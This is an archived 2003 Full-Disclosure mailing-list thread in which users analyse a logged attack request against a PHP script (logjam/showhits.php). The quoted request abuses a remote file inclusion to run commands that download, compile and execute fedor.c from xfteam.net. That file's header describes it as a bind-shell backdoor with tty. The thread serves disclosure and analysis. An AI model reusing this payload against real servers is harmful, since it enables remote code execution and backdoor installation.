[Full-Disclosure] http://xfteam.net/fedor.c - Anyone seen this before??
kang at insecure.ws
kang at insecure.ws
Mon Nov 24 10:29:57 GMT 2003
Dan wrote:
>Is it just me or is xfteam.net not resolving anyway?
>
>
>
xfteam.net has address 69.56.243.146
>Orignal HTTP request:
>GET /logjam/showhits.php?
>rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f
>
>Breaking this down we get(twice):
>uname -a
>cd /tmp
>wget http://xfteam.net/fedor.c
>gcc -o f fedor.c
>../f
>
>
>
/*
bindtty - like bindshell, but with tty
Features:
- it can handle any number of clients
- allocates tty for each session
- no using termios.h/tty.h: compiles on most of gccs
- linux specific ;(
by sd <sd at sf.cz>
*/
Full-Disclosure is hosted and sponsored by Secunia.